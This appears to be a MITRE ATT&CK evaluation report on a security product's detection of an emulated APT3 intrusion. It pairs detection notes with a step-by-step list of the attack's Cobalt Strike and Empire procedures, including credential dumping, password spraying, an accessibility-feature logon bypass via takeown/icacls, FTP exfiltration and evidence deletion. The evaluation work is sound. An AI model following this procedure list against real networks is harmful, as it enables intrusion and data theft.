A Specific Behavior alert was created for a RAR archive "written by a process with suspicious command line arguments." Details showed the flags -hp within the command line that indicated use of encryption, and the alert was mapped to a related ATT&CK Technique (Data Compressed) and the correct Tactic (Exfiltration). The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection. [1] [2]
Telemetry
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
Empire: Executed binary (recycler.exe) is a renamed copy of the WinRAR binary
Masquerading
(T1036)
Telemetry
Telemetry within the alert showed the command-line details for the execution of recycler.exe, and would also be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Specific Behavior (Tainted)
A Specific Behavior alert was created for a RAR archive "written by a process with suspicious command line arguments.". Details showed that recycler.exe wrote a RAR archive and that recycler.exe was signed by win.rar GmbH. The process tree view showed the recycler.exe alert as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because a .vsdx file was archived for likely exfiltration using the renamed WinRAR binary, recycler.exe.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
19.C.1
Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel
Exfiltration Over Alternative Protocol
(T1048)
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because collected files were exfiltrated via FTP.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating ftp.exe executing with ftp.txt was suspicious. The process tree view showed ftp.exe as tainted by a previous powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2]
Telemetry
Telemetry within the OverWatch alert showed ftp.exe executing with ftp.txt.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
19.D.1
Empire: 'del C:\"$"Recycle.bin\old.rar'
File Deletion
(T1107)
Telemetry
Telemetry showed the deletion of old.rar with an event name of FileDeleted. [1] [2] [3] [4]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because files (including old.rar) were deleted from the host CodeRed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
19.D.2
Empire: 'del recycler.exe'
File Deletion
(T1107)
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because files (including recycler.exe) were deleted from the host CodeRed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Telemetry
Telemetry showed the deletion of recycler.exe with an event name of ExecutableDeleted. [1] [2] [3] [4]
20.A.1
magnifer.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)
Accessibility Features
(T1015)
Telemetry
Telemetry within the alert showed the details for magnify.exe, and would also be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated on utilman.exe executing magnify.exe, noting that "a process chain bypassed Windows logon security." The alert was marked critical and was mapped to the correct ATT&CK Technique (Accessibility Features) and Tactic (Persistence). Data in the alert also showed that magnify.exe was identified as cmd.exe based on hash value in the common name field. [1] [2] [3] [4] [5]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating a Windows logon bypass on Creeper was observed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5]
RDP connection made to Creeper (10.0.0.4) as part of execution of persistence mechanism
Remote Desktop Protocol
(T1076)
Telemetry
Telemetry showed a logon type 10 (remote interactive logon) for Kmitnick on Creeper, indicating a RDP session was established and logged into. [1] [2] [3] [4] [5] [6] [7]
20.B.1
Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)
System Owner/User Discovery
(T1033)
Telemetry (Tainted)
Telemetry showed execution of whoami.exe. The process tree view showed whoami.exe was tainted by a previous magnify.exe detection. [1] [2] [3] [4] [5] [6]







Operational Flow The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

Step 1: Initial Compromise

1.A.1 Execution

User Execution

i. Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

1.A.1 Execution

Rundll32

i. Previously executed batch file (pdfhelper.cmd) launched a DLL payload (update.dat) using Rundll32

1.A.1 Execution

Scripting

i. Previously executed self-extracting archive (Resume Viewer.exe) launched an embedded batch file (pdfhelper.cmd)

1.B.1 Persistence

Registry Run Keys / Startup Folder

i. Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder

1.C.1 Command and Control

Commonly Used Port

i. Cobalt Strike: C2 channel established using port 53

1.C.1 Command and Control

Standard Application Layer Protocol

i. Cobalt Strike: C2 channel established using DNS traffic to freegoogleadsenseinfo.com

1.C.1 Command and Control

Data Encoding

i. Cobalt Strike: C2 channel established using both NetBIOS and base64 encoding

Step 2: Initial Discover

2.A.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'ipconfig -all' via cmd

2.A.2 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'arp -a' via cmd

2.B.1 Discovery

System Owner/User Discovery

i. Cobalt Strike: 'echo' via cmd to enumerate specific environment variables

2.C.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

2.C.2 Discovery

Process Discovery

i. Cobalt Strike: 'tasklist -v' via cmd

2.D.1 Discovery

System Service Discovery

i. Cobalt Strike: 'sc query' via cmd

2.D.2 Discovery

System Service Discovery

i. Cobalt Strike: 'net start' via cmd

2.E.1 Discovery

System Information Discovery

i. Cobalt Strike: 'systeminfo' via cmd

2.E.2 Discovery

System Information Discovery

i. Cobalt Strike: 'net config workstation' via cmd

2.F.1 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators' via cmd

2.F.2 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators -domain' via cmd

2.F.3 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net group "Domain Admins" -domain' via cmd

2.G.1 Discovery

Account Discovery

i. Cobalt Strike: 'net user -domain' via cmd

2.G.2 Discovery

Account Discovery

i. Cobalt Strike: 'net user george -domain' via cmd

2.H.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key

Step 3: Privilege Escalation

3.A.1 Privilege Escalation

Bypass User Account Control

i. Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level

3.A.1 Privilege Escalation

Access Token Manipulation

i. Cobalt Strike: Built-in UAC bypass token duplication capability executed to modify current process token

3.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

3.C.1 Privilege Escalation

Process Injection

i. Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe

Step 4: Discovery for Lateral Movement

4.A.1 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Controllers" -domain' via cmd

4.A.2 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Computers" -domain' via cmd

4.B.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd

4.C.1 Discovery

System Network Connections Discovery

i. Cobalt Strike: 'netstat -ano' via cmd

Step 5: Credential Access

5.A.1 Credential Access

Credential Dumping

i. Cobalt Strike: Built-in Mimikatz credential dump capability executed

5.A.1 Credential Access

Process Injection

i. Cobalt Strike: Credential dump capability involved process injection into lsass

5.A.2 Credential Access

Credential Dumping

i. Cobalt Strike: Built-in hash dump capability executed

5.A.2 Credential Access

Process Injection

i. Cobalt Strike: Hash dump capability involved process injection into lsass.exe

5.B.1 Privilege Escalation

Access Token Manipulation

i. Cobalt Strike: Built-in token theft capability executed to change user context to George

Step 6: Lateral Movement

6.A.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)

6.B.1 Command and Control

Commonly Used Port

i. Cobalt Strike: C2 channel modified to use port 80

6.B.1 Command and Control

Standard Application Layer Protocol

i. Cobalt Strike: C2 channel modified to use HTTP traffic to freegoogleadsenseinfo.com

6.B.1 Command and Control

Multiband Communication

i. Cobalt Strike: C2 channel modified to split communications between both HTTP and DNS

6.C.1 Lateral Movement

Remote Desktop Protocol

i. Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)

Step 7: Persistence

7.A.1 Persistence

Create Account

i. Added user Jesse to Conficker (10.0.0.5) through RDP connection

7.A.1 Persistence

Graphical User Interface

i. Microsoft Management Console (Local Users and Groups snap-in) GUI utility used to add new user through RDP connection

7.A.1 Persistence

Account Discovery

i. Microsoft Management Console (Local Users and Groups snap-in) GUI utility displayed user account information

7.B.1 Command and Control

Remote File Copy

i. Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)

7.C.1 Persistence

Scheduled Task

i. Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)

Step 8: Collection

8.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'dir -s -b "\\conficker\wormshare"' via cmd

8.A.2 Discovery

File and Directory Discovery

i. Cobalt Strike: 'tree "C:\Users\debbie"' via cmd

8.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

8.C.1 Collection

Input Capture

i. Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie

8.C.1 Collection

Application Window Discovery

i. Cobalt Strike: Keylogging capability included residual enumeration of application windows

8.D.1 Collection

Screen Capture

i. Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie

8.D.1 Collection

Process Injection

i. Cobalt Strike: Screen capture capability involved process injection into explorer.exe

Step 9: Exfiltration

9.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

9.B.1 Exfiltration

Data from Network Shared Drive

i. Cobalt Strike: Built-in download capability executed to a collect file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

9.B.1 Exfiltration

Exfiltration Over Command and Control Channel

i. Cobalt Strike: Download capability exfiltrated data through existing C2 channel

Step 10: Execution of Persistence

10.A.1 Persistence

Registry Run Keys / Startup Folder

i. Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32

10.A.2 Persistence

Scheduled Task

i. Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32

10.B.1 Persistence

Valid Accounts

i. RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse

10.B.1 Persistence

Remote Desktop Protocol

i. RDP connection made to Conficker (10.0.0.5) as part of execution of persistence mechanism

Step 11: Initial Access

11.A.1 Execution

Scripting

i. Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)

11.B.1 Command and Control

Commonly Used Port

i. Empire: C2 channel established using port 443

11.B.1 Command and Control

Standard Application Layer Protocol

i. Empire: C2 channel established using HTTPS traffic to freegoogleadsenseinfo.com

11.B.1 Command and Control

Standard Cryptographic Protocol

i. Empire: Encrypted C2 channel established using HTTPS

Step 12: Initial Discover

12.A.1 Discovery

System Network Configuration Discovery

i. Empire: 'route print' via PowerShell

12.A.2 Discovery

System Network Configuration Discovery

i. Empire: 'ipconfig -all' via PowerShell

12.B.1 Discovery

System Owner/User Discovery

i. Empire: 'whoami -all -fo list' via PowerShell

12.C.1 Discovery

Process Discovery

i. Empire: 'qprocess *' via PowerShell

12.D.1 Discovery

System Service Discovery

i. Empire: 'net start' via PowerShell

12.E.1 Discovery

Scripting

i. Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques

12.E.1.1 Discovery

System Owner/User Discovery

i. Empire: WinEnum module included enumeration of user information

12.E.1.2 Discovery

Permission Groups Discovery

i. Empire: WinEnum module included enumeration of AD group memberships

12.E.1.3 Discovery

Password Policy Discovery

i. Empire: WinEnum module included enumeration of password policy information

12.E.1.4.1 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of recently opened files

12.E.1.4.2 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of interesting files

12.E.1.5 Discovery

Clipboard Data

i. Empire: WinEnum module included enumeration of clipboard contents

12.E.1.6.1 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of system information

12.E.1.6.2 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of Windows update information

12.E.1.7 Discovery

Query Registry

i. Empire: WinEnum module included enumeration of system information via a Registry query

12.E.1.8 Discovery

System Service Discovery

i. Empire: WinEnum module included enumeration of services

12.E.1.9.1 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of available shares

12.E.1.9.2 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of mapped network drives

12.E.1.10.1 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of AV solutions

12.E.1.10.2 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of firewall rules

12.E.1.11 Discovery

System Network Configuration Discovery

i. Empire: WinEnum module included enumeration of network adapters

12.E.1.12 Discovery

System Network Connections Discovery

i. Empire: WinEnum module included enumeration of established network connections

12.F.1 Discovery

Permission Groups Discovery

i. Empire: 'net group "Domain Admins" -domain' via PowerShell

12.F.2 Discovery

Permission Groups Discovery

i. Empire: 'net�localgroup�administrators' via PowerShell

12.G.1 Discovery

Account Discovery

i. Empire: 'net user' via PowerShell

12.G.2 Discovery

Account Discovery

i. Empire: 'net user -domain' via PowerShell

Step 13: Discovery for Lateral Movement

13.A.1 Discovery

Remote System Discovery

i. Empire: 'net group "Domain Computers" -domain' via PowerShell

13.B.1 Discovery

System Network Connections Discovery

i. Empire: 'net use' via PowerShell

13.B.2 Discovery

System Network Connections Discovery

i. Empire: 'netstat -ano' via PowerShell

13.C.1 Discovery

Query Registry

i. Empire:�'reg query' via PowerShell to enumerate a specific Registry key

Step 14: Privilege Escalation

14.A.1 Privilege Escalation

Bypass User Account Control

i. Empire: Built-in UAC bypass token duplication module executed to launch new callback with elevated process integrity level

14.A.1 Privilege Escalation

Remote File Copy

i. Empire: UAC bypass module downloaded and wrote a new Empire stager (wdbypass) to disk

14.A.1 Privilege Escalation

Standard Application Layer Protocol

i. Empire: UAC bypass module downloaded a new Empire stager (wdbypass) over HTTP

14.A.1 Privilege Escalation

Commonly Used Port

i. Empire: UAC bypass module downloaded a new Empire stager (wdbypass) over port 8080

Step 15: Credential Access

15.A.1 Credential Access

Input Capture

i. Empire: Built-in keylogging module executed to capture keystrokes of user Bob

15.A.1 Credential Access

Application Window Discovery

i. Empire: Built-in keylogging module included residual enumeration of application windows

15.B.1 Credential Access

Credentials in Files

i. Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 16: Lateral Movement

16.A.1 Credential Access

Brute Force

i. Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users�Kmitnick, Bob, and Frieda

16.A.1 Credential Access

Windows Admin Shares

i. Empire: Brute force password spraying attempts targeted Windows admin shares on Morris (10.0.1.4) and Nimda (10.0.1.6)

16.B.1 Lateral Movement

Valid Accounts

i. Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick

16.B.1 Lateral Movement

Windows Admin Shares

i. Empire: Successful authentication targeted Windows admin share on Conficker (10.0.0.5)�

16.B.1 Lateral Movement

Brute Force

i. Empire: Successful authentication to Conficker (10.0.0.5) using credentials of user Kmitnick as a result of the brute force password spraying

16.C.1 Defense Evasion

Network Share Connection Removal

i. Empire: 'net use -delete' via PowerShell

16.D.1 Lateral Movement

Windows Admin Shares

i. Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)

16.D.1 Lateral Movement

Valid Accounts

i. Empire: 'net use' via PowerShell to successfully authenticate to Creeper (10.0.0.4) using credentials of user Kmitnick

16.E.1 Command and Control

Remote File Copy

i. Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)

16.F.1 Execution

Command-Line Interface

i. Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick�

16.G.1 Lateral Movement

Remote File Copy

i. Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)

16.H.1 Discovery

System Service Discovery

i. Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)

16.I.1 Privilege Escalation

New Service

i. Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)

16.I.1 Privilege Escalation

Masquerading

i. Empire: 'sc description' via PowerShell to remotely disguise a service on Creeper (10.0.0.4)

16.J.1 Discovery

System Service Discovery

i. Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)

16.K.1 Discovery

File and Directory Discovery

i. Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)

16.L.1 Execution

Service Execution

i. Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)

Step 17: Persistence

17.A.1 Discovery

System Service Discovery

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services

17.A.1 Discovery

Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key

17.B.1 Persistence

File and Directory Permissions Modification

i. Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe

17.B.2 Persistence

File and Directory Permissions Modification

i. Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe

17.C.1 Persistence

Accessibility Features

i. Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe

Step 18: Collection

18.A.1 Discovery

File and Directory Discovery

i. Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

18.B.1 Collection

Data Staged

i. Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)

18.B.1 Collection

Data from Network Shared Drive

i. Empire: 'copy' via PowerShell collected a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 19: Exfiltration

19.A.1 Command and Control

Masquerading

i. Empire: File dropped to disk is a renamed copy of the WinRAR binary

19.A.1 Command and Control

Remote File Copy

i. Empire: Built-in upload module executed to write binary (recycler.exe) to disk on CodeRed (10.0.1.5)

19.B.1 Defense Evasion

Data Compressed

i. Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file

19.B.1 Defense Evasion

Data Encrypted

i. Empire: Executed binary (recycler.exe) created encrypted archive (old.rar) of previously collected file

19.B.1 Exfiltration

Masquerading

i. Empire: Executed binary (recycler.exe) is a renamed copy of the WinRAR binary

19.C.1 Defense Evasion

Exfiltration Over Alternative Protocol

i. Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel

19.D.1 Defense Evasion

File Deletion

i. Empire: 'del C:\"$"Recycle.bin\old.rar'

19.D.2 Defense Evasion

File Deletion

i. Empire: 'del recycler.exe'

Step 20: Execution of Persistence

20.A.1 Persistence

Accessibility Features

i. magnifer.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)

20.A.1 Persistence

Remote Desktop Protocol

i. RDP connection made to Creeper (10.0.0.4) as part of execution of persistence mechanism

20.B.1 Execution

System Owner/User Discovery

i. Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)